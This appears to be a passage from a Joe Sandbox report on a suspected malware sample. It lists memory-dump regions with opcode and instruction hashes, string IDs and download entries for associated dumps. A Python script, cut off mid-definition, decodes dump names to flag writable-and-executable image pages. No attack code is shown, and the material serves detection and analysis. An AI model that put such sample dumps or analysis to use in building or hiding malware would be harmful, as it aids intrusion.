                                                            • Opcode Fuzzy Hash: 4f088db275ae0281147a920004dde3c5d2525048038d26bc22506453e6569a81
                                                            • Instruction Fuzzy Hash: A6E1FFB5501B008FD365CF28E996B97BBE1FF46708F04886CE4AACB752E735B8148B54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: %*+(
                                                            • API String ID: 2994545307-3233224373
                                                            • Opcode ID: 8d2dc0ce5b22d23b90786b53f6aa9d2f92bb18f3f7fc9ad99d21fd6e9fe187a9
                                                            • Instruction ID: 572b04e4e16b81a41e7693b25262b69b4b835fbdb0cca3c1dd3abf684c2edd40
                                                            • Opcode Fuzzy Hash: 8d2dc0ce5b22d23b90786b53f6aa9d2f92bb18f3f7fc9ad99d21fd6e9fe187a9
                                                            • Instruction Fuzzy Hash: FEB1FF715083018FD714DF14D8A1A2BBFF6FF95342F14482EE9859B292E335E858CBA2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+(
                                                            • API String ID: 0-3233224373
                                                            • Opcode ID: 699a868907914a825009203ce74efc40c814acbf77eeb2f380139755d2bc67a9
                                                            • Instruction ID: 4377c6fb3e832230c7ebd02c9abac3ccab3d3cb8a8e73afe2633e18e579321b2
                                                            • Opcode Fuzzy Hash: 699a868907914a825009203ce74efc40c814acbf77eeb2f380139755d2bc67a9
                                                            • Instruction Fuzzy Hash: F861F372908205DBD710EF18DC46ABABBB0FF95358F08582CF9859B391E731D914D7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+(
                                                            • API String ID: 0-3233224373
                                                            • Opcode ID: e5069055bb2889f8890c8c45e75e8d10b7824a26220e53ac5d1a690a80a6c338
                                                            • Instruction ID: 97a2cf9d103eb5ce90893f98b7aff1d8ddf51f03b251328fc4ea8562088338e4
                                                            • Opcode Fuzzy Hash: e5069055bb2889f8890c8c45e75e8d10b7824a26220e53ac5d1a690a80a6c338
                                                            • Instruction Fuzzy Hash: 9161CF716083019BDB119F15E880B2ABBEAFBC4310F58C91CE98D87261D771EC04EF92
                                                            Strings
                                                            • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0053E333
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                            • API String ID: 0-2471034898
                                                            • Opcode ID: a4e583a74f89152def61b801015efebdd17c873e90ebcca54d095e6af9035010
                                                            • Instruction ID: ff0eaefd2c9a599ca137623e943d796860fd8bd844e2921c1271e7d580ce88d9
                                                            • Opcode Fuzzy Hash: a4e583a74f89152def61b801015efebdd17c873e90ebcca54d095e6af9035010
                                                            • Instruction Fuzzy Hash: EF514437A196904BD329893C5C522AA6FC72FE2334F2D8B69E9F58B3E0D51588049390
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+(
                                                            • API String ID: 0-3233224373
                                                            • Opcode ID: dcb96b50e159584668f0c3d19f2cd51ead9c421042a6ce451b23ca70f34341a6
                                                            • Instruction ID: a078058b510144392a63c3dbeefe9a9551d4dccda81fd16dfbb0c32a2c4d8842
                                                            • Opcode Fuzzy Hash: dcb96b50e159584668f0c3d19f2cd51ead9c421042a6ce451b23ca70f34341a6
                                                            • Instruction Fuzzy Hash: 0C519E706092019BCB24DF19E885A2ABFE5FB85764F18C82CE4CA97251D372DD10FB62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L3
                                                            • API String ID: 0-2730849248
                                                            • Opcode ID: b2e761d1fbaae9901a7f23c2b32f7a25a00d9673f5f90928234dcff0e89ebc6a
                                                            • Instruction ID: 03b51cb3af1a81e7e1dbf6ea0704afe17e9c940e3155b4eff9474529a72b3706
                                                            • Opcode Fuzzy Hash: b2e761d1fbaae9901a7f23c2b32f7a25a00d9673f5f90928234dcff0e89ebc6a
                                                            • Instruction Fuzzy Hash: A04160B44083819BC7149F24D894A6FBBF0BF86318F04991CF9C59B291E736CA45CB5A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*+(
                                                            • API String ID: 0-3233224373
                                                            • Opcode ID: 34fbc10fd098a567dc28b877148b214597cc0d8a95829a62bf720bdf285737ca
                                                            • Instruction ID: 65cdab9b75d3055845fc73057a503cb1e5806eac1c3b1643ef46b29168368ea5
                                                            • Opcode Fuzzy Hash: 34fbc10fd098a567dc28b877148b214597cc0d8a95829a62bf720bdf285737ca
                                                            • Instruction Fuzzy Hash: 55415975205B04DBD734CB61D998B26BBF2FB4D708F148818E98B9B6A1E331F8009F10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID: @
                                                            • API String ID: 2994545307-2766056989
                                                            • Opcode ID: 5a60839c43b653b256bd64e55f4a9187fa194b88ab304c34842cf7259128b0bf
                                                            • Instruction ID: 4d9e2450226f2b7e744d13135105665e22dd9656e8aac0016e71e8c6b00efdeb
                                                            • Opcode Fuzzy Hash: 5a60839c43b653b256bd64e55f4a9187fa194b88ab304c34842cf7259128b0bf
                                                            • Instruction Fuzzy Hash: 0C3178705083009BD320EF14E880A2AFBF9FF9A354F54D92CE5C997251E335D904DBA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: efb29da7d79096bacc6094e4b34e266ec592ef3032653cf8f6be9c20689d955e
                                                            • Instruction ID: adbdf2ed2c01559a7ef6b08593a4d55ad9609d6184ad003352c30a248e8212fc
                                                            • Opcode Fuzzy Hash: efb29da7d79096bacc6094e4b34e266ec592ef3032653cf8f6be9c20689d955e
                                                            • Instruction Fuzzy Hash: 885208329087118BC725DF18D8442BBFBE1FFD5319F294A2DD9C6A7281E734A851CB86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6212bf7ef53d90d5c52b7f9dca0e1cd9d1bc5b4f631ca8a0588aaa50f1e087ad
                                                            • Instruction ID: 8b8e8de4c2c8a89c9ea065c7d5157ecc5c7908d7b64ad9f9fa037ec7cfb08920
                                                            • Opcode Fuzzy Hash: 6212bf7ef53d90d5c52b7f9dca0e1cd9d1bc5b4f631ca8a0588aaa50f1e087ad
                                                            • Instruction Fuzzy Hash: EEF18A766087418FD724CF29C88166BFBE6BFD8300F08882DE4D587752E639E945CB96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab0ffa581ae49f987acb9b1bca04b9a9e378426b89f686002d56ea1de386bdc0
                                                            • Instruction ID: 3c778312f502d0868ec3d35d330375398bd76537879873e20e5bdfed893a6629
                                                            • Opcode Fuzzy Hash: ab0ffa581ae49f987acb9b1bca04b9a9e378426b89f686002d56ea1de386bdc0
                                                            • Instruction Fuzzy Hash: 27C15E72A087418FD360CF68DC967ABBBF1BF85318F08492DD2D9C6242E778A155CB46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa528bf26784b7336c037dc3199d1250e1dc638c75204ed24177d4584d1f2827
                                                            • Instruction ID: 54919bca780e2048347bdd723438269ca37bd720242c5f8c2ab4d428a92e774e
                                                            • Opcode Fuzzy Hash: fa528bf26784b7336c037dc3199d1250e1dc638c75204ed24177d4584d1f2827
                                                            • Instruction Fuzzy Hash: D5B1FFB4600B408BD3258F24D985BA7BBF1BF46708F54885CE8AA8BA52E735F805CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35098f3bd5e8c8794a9ab2ada6d9d34da1fa487f981694a07b9531c00a4eae3b
                                                            • Instruction ID: b0c3d97443442c487c9ab878da43d511f9d82539777a6b6ef3c1da263946f587
                                                            • Opcode Fuzzy Hash: 35098f3bd5e8c8794a9ab2ada6d9d34da1fa487f981694a07b9531c00a4eae3b
                                                            • Instruction Fuzzy Hash: B0817E342087018BD724DF28E880A2EBBE5FF95750F55C92CE98AC7252E731EC10DB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 947e5a158ef57b7d85cd0a423879e52d2d184c21566fcd337b60051b1e67fd5f
                                                            • Instruction ID: 0ad0660db805d00da24f6f36493f6542bdb49e8ed695414aac935dcbeb34b3e8
                                                            • Opcode Fuzzy Hash: 947e5a158ef57b7d85cd0a423879e52d2d184c21566fcd337b60051b1e67fd5f
                                                            • Instruction Fuzzy Hash: 8781D2B4810B00AFD360EF39D94B797BEF4BB06205F404A1DE4EA96655E7306459CBE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53adb1b22930f8a695f789fdc3f4b943ccd6ac5fb5c634955e3c1cdf4e3fec6a
                                                            • Instruction ID: 9e9b3d7f529b2c9771303a254f75af926c9018dfcc616004bf5f1961e24b9ac1
                                                            • Opcode Fuzzy Hash: 53adb1b22930f8a695f789fdc3f4b943ccd6ac5fb5c634955e3c1cdf4e3fec6a
                                                            • Instruction Fuzzy Hash: 0E517CB56097548FE314DF69D89535BBBE1BBC5318F044E2DE4E983350E379DA088B82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cbaeba4ea5d576dc6f47b429163d010aa164bba3ebf3e741f9cfd684f8d17945
                                                            • Instruction ID: 685fe718bd2089bada13117055f041bc687bbc0076eff995b56f93722697aee5
                                                            • Opcode Fuzzy Hash: cbaeba4ea5d576dc6f47b429163d010aa164bba3ebf3e741f9cfd684f8d17945
                                                            • Instruction Fuzzy Hash: B051D375A047059FC714DF14C890926BFA1FF85328F595A6CE89A9B352E630EC42CB92
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c4d293db728f41e0f23338662b502fdaf5e2332d5f6a4ef450a996a86a5afaaa
                                                            • Instruction ID: 18f0fcd6ede0825cb4c9a3310626326e974be69256312bca8319133f862d74d1
                                                            • Opcode Fuzzy Hash: c4d293db728f41e0f23338662b502fdaf5e2332d5f6a4ef450a996a86a5afaaa
                                                            • Instruction Fuzzy Hash: 1A417F74208300ABDB11DB15E990B2ABBFAFB95750F54C82CF98E97251D335EC00EB66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6c49dd606d9bb9ecd2710ecfb6eaee848707574394f385b34e1a26ee75059a8
                                                            • Instruction ID: 1a6ff05dd3594d502df0e964aa8c1f1a2354954296439440da51b3ae235895fe
                                                            • Opcode Fuzzy Hash: c6c49dd606d9bb9ecd2710ecfb6eaee848707574394f385b34e1a26ee75059a8
                                                            • Instruction Fuzzy Hash: 5341E872A083654FD35CCE2A849427ABFE2BFC5300F49866EF4DA873D1DA748945D781
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f4d851563fb0ee45f8b7693b2c17e8daecf94ac7b5aec7e1911874442c5c896c
                                                            • Instruction ID: a138e611c505cb6603b2d9ce6707500f4e1282e908be5b7ec409d797fcdefe2c
                                                            • Opcode Fuzzy Hash: f4d851563fb0ee45f8b7693b2c17e8daecf94ac7b5aec7e1911874442c5c896c
                                                            • Instruction Fuzzy Hash: 2B410274508380ABD310AB54C888B1EFBF5FB96348F144D1CF6C497252C376D8588F6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc753b1b0f7687e061c73975297b91117710f3bd34b327e82062d0812949b600
                                                            • Instruction ID: c65a9ace1f3346dc467c1a67910adfa78357163c4c9d25817786c00d9335198f
                                                            • Opcode Fuzzy Hash: fc753b1b0f7687e061c73975297b91117710f3bd34b327e82062d0812949b600
                                                            • Instruction Fuzzy Hash: AC41CFB16483818BD7309F10C845BEFBBB0FFA6364F040958E98A9B7A1E7744844DB63
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ee122a49834589fd6e39718d65d0040eca334daf207fc2b6e37478eade29261
                                                            • Instruction ID: eb6df437ecc83fca55b4b80719c5c598ce447e1328422b54adc4fa0f54072229
                                                            • Opcode Fuzzy Hash: 0ee122a49834589fd6e39718d65d0040eca334daf207fc2b6e37478eade29261
                                                            • Instruction Fuzzy Hash: 0A31C8316482019BD7149E58D880A3BBFE2FFC8359F18892DE89A9B341D331EC52CF46
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13480bf7c755c76479b7d19ed520239b8c69ffc9a77f65bada362d2a0dab4c66
                                                            • Instruction ID: 7846ead31433361fd0bacfa4dbe8fa03c5f8f6f2fc39c41ddcb800b9c96acb05
                                                            • Opcode Fuzzy Hash: 13480bf7c755c76479b7d19ed520239b8c69ffc9a77f65bada362d2a0dab4c66
                                                            • Instruction Fuzzy Hash: 3BF0243A71820A1BB210CDABA88483BB79AEBD9355F14953CEA44C3205DD72E806A190
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                            • Instruction ID: afd6f86e1ed7dc578beff9a6215ab27dc393fb41cabbec3b70aacfa27007612f
                                                            • Opcode Fuzzy Hash: d8ebd7708255391ffa87ed53dd5dbf97c7cff7b52fcdad9dabb06971c835301f
                                                            • Instruction Fuzzy Hash: EB014B72A196204B8308CE3C9C1112ABEE19B86330F158B2EBCFAD73E0D664CD548696
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                            • Instruction ID: d770ef9dbea3af173b59e5b6babfa74966a694f45f2cf12d39a7715be5b9e5b3
                                                            • Opcode Fuzzy Hash: 809ee23363f840c811a801533be2b64f834fb93f4c5a4ab9cc37b5a2fd812bb4
                                                            • Instruction Fuzzy Hash: 44F05CB160411017EF22CA549CC0FB7BF9DDB8731CF090426F94453103D2A1D844C3E5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d74ffc955a6c69e274ef68a3b89d7f1c09b007da44e71c0a36107b415a2b6168
                                                            • Instruction ID: fedb6cafe6319fb0119596142b89ad1f093faeefdb8954eb87de47d8faab3256
                                                            • Opcode Fuzzy Hash: d74ffc955a6c69e274ef68a3b89d7f1c09b007da44e71c0a36107b415a2b6168
                                                            • Instruction Fuzzy Hash: 7DC08C34A180018BCA44CF01FC95432B7B9A72730CB00703ADE07F3232EA20C44ABB09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                            • Associated: 00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950595330.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950633013.000000000059B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950651015.000000000059C000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950752524.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950769763.00000000006F4000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.0000000000704000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950822182.0000000000718000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950838248.0000000000719000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950858061.000000000072E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950873788.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950895691.0000000000741000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950938101.000000000076F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950955143.0000000000773000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950970541.0000000000774000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1950986942.0000000000778000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951003744.0000000000780000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951019645.0000000000786000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951035676.000000000078E000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951050527.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951066661.0000000000791000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951082258.0000000000792000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951099199.000000000079F000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951116250.00000000007A1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951132012.00000000007A2000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951148225.00000000007A9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951165468.00000000007AA000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951183788.00000000007B3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951206288.00000000007C8000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951223637.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951240730.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007D3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951256285.00000000007F3000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951300918.0000000000820000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951319648.0000000000825000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.0000000000826000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951335507.000000000082B000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1951369722.000000000083A000.00000040.00000001.01000000.00000003.sdmp
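The dump names in the listing above encode, among other things, the region's start address and what look like the Windows PAGE_* protection and MEM_* type constants of the page at dump time (0x40 is PAGE_EXECUTE_READWRITE, 0x80 is PAGE_EXECUTE_WRITECOPY, 0x04 is PAGE_READWRITE, 0x01000000 is MEM_IMAGE). The following is an added example, not Joe Sandbox code: the dotted field layout it assumes is inferred from this listing rather than taken from any documented format, so fields it cannot interpret are kept raw. The three sample names are copied from the listing, and 0x530000 is the offset reported for the source dump. It decodes each name and flags image-backed pages that are both writable and executable, the condition a conventionally linked PE should not exhibit and the sort of evidence behind "changes PE section rights" findings.

```python
"""Decode Joe Sandbox memory-dump file names (*.sdmp) and flag W+X image pages.

Added example; not Joe Sandbox's own code. The field layout below is an
ASSUMPTION inferred from the report listing: field 4 is the region base
address, field 5 decodes cleanly as a PAGE_* protection constant and field 7
as a MEM_* type constant. Fields 1, 2, 3, 6 and 8 are not interpreted.
"""
import re
from dataclasses import dataclass

# Windows memory protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
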